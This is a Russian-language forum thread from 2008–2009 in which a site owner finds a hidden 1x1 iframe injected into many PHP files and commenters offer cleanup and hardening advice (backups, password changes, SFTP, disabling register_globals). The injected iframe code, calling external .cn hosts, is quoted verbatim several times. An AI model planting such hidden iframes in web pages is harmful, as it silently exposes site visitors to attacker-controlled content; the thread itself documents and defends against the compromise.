Безопасность или глюк хостера

Сегодня открываю сайт — получаю следующее: Parse error: syntax error, unexpected '?' in /....../public_html/index.php on line 78 Скачал index.php, открыл, в самом конце после

</table>
</fieldset>

наблюдаю

<? } ?<html><body><iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

Во всем остальном index.php не изменился. Что это было? Может глюк на хостинге? Очень хочется верить именно в это. На всякий случай пишу, пусть Макс в курсе будет, мало ли что может быть.

18 комментариев

Ниче не понимаю…в config.php в конце тоже самое ?<html><body><iframe src="diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>> Сейчас буду с хостером разбираться…

yuri25
23 декабря 2008, 20:11
+1
↓

А не вирус ли это?

zaigraeff
23 декабря 2008, 20:22
+1
↓

xerax.ru/wps/ меняйте пароли, быстрейщего выздоровления

Covax
23 декабря 2008, 20:39
+2
↓

Вот проклятые китайцы, в 111 файлах эта хрень… никто не подскажет как бы автоматизировать процес замены в файлах ?<html><body><iframe src="diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>> на ?> Или все таки ручками каждый файл придется исправлять?

yuri25
23 декабря 2008, 21:32
+1
↑
↓

залить из вчерашнего бекапа

DiMkA
23 декабря 2008, 21:47
+1
↑
↓

я лечил через ssh, поиском в mc

Lego
12 января 2009, 15:35
0
↑
↓

Воспользуйся софтинкой www.searchandreplace.com/search_replace.htm весьма полезная в хозяйстве :)
Умеет искать и заменять по маске фрагменты в куче файлов.

zaigraeff
23 декабря 2008, 23:30
+1
↓

забыл добавить ссылку на скачивание www.searchandreplace.com/dwld/sredown.cgi

zaigraeff
23 декабря 2008, 23:32
+1
↓

Спасибо ребята, все исправил.

yuri25
23 декабря 2008, 23:53
+1
↓

Никто, кстати не знает как это появляется. Просто у меня собственный сервак и я все с нуля сам настраивал, — вот, так что не стал бы сам себе заливать рекламу…

Есть мнение что имеется уязвимый скрипт, — через который и происходит дозапись, по всем файлам…

Lego
12 января 2009, 15:36
0
↓

Распространённая проблема, в 99% случаев вызывается компрометацией паролей для доступа по фтп. Пароль могли тупо подобрать либо, что более вероятно, украсть при помощи трояна.

onthefly
26 марта 2009, 19:24
0
↑
↓

Опять проклятые китайцы… 3 месяца все было спокойно и вот вчера опять. На этот раз:

<code>?<html><body><iframe src="http://coolnameshop.cn/in.cgi?income22" width=1 height=1 style="visibility: hidden"></iframe></body></html>></code>

Как бороться с этой хренью? Подскажите может как то можно блокировать доменную зону cn? Может у меня хостер дырявый? Ни у кого ничего такого не было? Спасибо.

yuri25
26 марта 2009, 17:28
0
↓

смените пароль на фтп

onthefly
26 марта 2009, 19:20
0
↑
↓

Я вот использую WinSCP для работы с удаленными файлами. Отключил ftp вообще и не парюсь )

skif
26 марта 2009, 19:27
0
↑
↓

Тоже перешел на WinSCP, спасибо за подсказку.

yuri25
26 марта 2009, 22:45
0
↑
↓

И проверьте включен ли register_globals, если да, то выключите его нафиг.

Carw
26 марта 2009, 22:58
0
↑
↓

Блин, у хостера еще и register_globals On, надо в .htaccess off прописать, а я тут демагогию развожу:) Спасибо огромное за наводки, что то я расслабился:)

yuri25
26 марта 2009, 23:26
0
↑
↓

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.

LiveStreet CMS

Бесплатные расширения из каталога

Безопасность или глюк хостера

18 комментариев